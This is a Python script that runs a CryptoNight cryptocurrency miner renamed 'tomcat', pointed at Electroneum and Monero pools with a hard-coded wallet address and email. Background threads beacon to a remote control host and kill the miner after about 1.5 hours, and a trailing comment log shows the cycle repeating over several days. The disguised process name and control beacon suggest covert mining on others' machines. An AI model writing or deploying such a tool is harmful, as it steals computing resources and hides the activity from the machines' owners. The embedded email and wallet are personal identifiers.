import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:34:04.502096
#2018-02-17 16:19:05.193622
#2018-02-17 18:08:03.927006
#2018-02-17 19:56:07.701006
#2018-02-17 21:45:07.860403
#2018-02-17 23:29:01.698572
#2018-02-18 01:19:01.256663
#2018-02-18 03:06:07.163768
#2018-02-18 04:53:01.550776
#2018-02-18 06:43:04.136117
#2018-02-18 08:32:04.356845
#2018-02-18 10:19:06.078761
#2018-02-18 12:05:05.183609
#2018-02-18 13:50:06.223343
#2018-02-18 15:43:06.896254
#2018-02-18 17:33:05.706825
#2018-02-18 19:21:01.873612
#2018-02-18 21:06:06.909709
#2018-02-18 22:53:06.123038
#2018-02-19 00:41:07.660946
#2018-02-19 02:27:04.327841
#2018-02-19 04:14:06.486256
#2018-02-19 05:58:07.108360
#2018-02-19 07:48:06.020084
#2018-02-19 09:38:05.325658
#2018-02-19 11:27:04.454993
#2018-02-19 13:13:07.726172
#2018-02-19 15:03:07.026189
#2018-02-19 16:52:07.351977
#2018-02-19 18:40:02.094379
#2018-02-19 20:26:06.032313
#2018-02-19 22:14:05.019283
#2018-02-20 00:00:01.950332
#2018-02-20 01:47:03.457873
#2018-02-20 03:34:07.690841
#2018-02-20 05:21:02.069087
#2018-02-20 07:04:08.271435
#2018-02-20 08:49:07.944190
#2018-02-20 10:33:06.066339
#2018-02-20 12:18:08.317351
#2018-02-20 14:05:01.902963
#2018-02-20 15:49:10.092756
#2018-02-20 17:36:12.925115
#2018-02-20 19:24:07.318575
#2018-02-20 21:12:08.161639
#2018-02-20 22:56:08.256792
#2018-02-21 00:41:07.822945
#2018-02-21 02:27:04.996612
#2018-02-21 04:14:03.594713
#2018-02-21 06:02:01.575493
#2018-02-21 07:50:08.307235
#2018-02-21 09:34:07.005346
#2018-02-21 11:22:08.561053
#2018-02-21 13:09:06.399093
#2018-02-21 14:56:06.302543
#2018-02-21 16:44:06.114544
#2018-02-21 18:35:05.745801
#2018-02-21 20:20:08.396431
#2018-02-21 22:07:04.550509
#2018-02-21 23:57:01.587313
#2018-02-22 01:46:03.950794
#2018-02-22 03:33:06.938201
#2018-02-22 05:19:01.787771
#2018-02-22 07:02:08.122603
#2018-02-22 08:50:04.184970
#2018-02-22 10:37:06.520954
#2018-02-22 12:24:01.329561
#2018-02-22 14:08:10.124531
#2018-02-22 15:55:08.094340
#2018-02-22 17:43:08.105507
#2018-02-22 19:30:03.221471
#2018-02-22 21:22:06.743700
#2018-02-22 23:09:01.924766
#2018-02-23 00:55:06.168547
#2018-02-23 02:42:02.113242
#2018-02-23 04:30:09.398275
#2018-02-23 06:16:05.825346
#2018-02-23 08:03:01.908381
#2018-02-23 10:19:08.759714
#2018-02-23 12:13:06.701108
#2018-02-23 13:59:09.045677
#2018-02-23 15:52:05.488909
#2018-02-23 17:37:08.992599
#2018-02-23 19:25:07.098195
#2018-02-23 21:08:01.449583
#2018-02-23 22:54:09.633152
#2018-02-24 00:41:06.061724
#2018-02-24 02:32:01.336465
#2018-02-24 04:25:06.007277
#2018-02-24 06:11:05.796005
#2018-02-24 07:58:01.720878
#2018-02-24 09:42:05.037154
#2018-02-24 11:37:06.491573
#2018-02-24 13:27:01.954383
#2018-02-24 15:15:08.069488
#2018-02-24 17:04:01.641677
#2018-02-24 18:54:07.481916
#2018-02-24 20:42:05.962757
#2018-02-24 22:52:05.201429
#2018-02-25 02:12:05.643926
#2018-02-25 05:58:04.381312
#2018-02-25 11:38:07.739301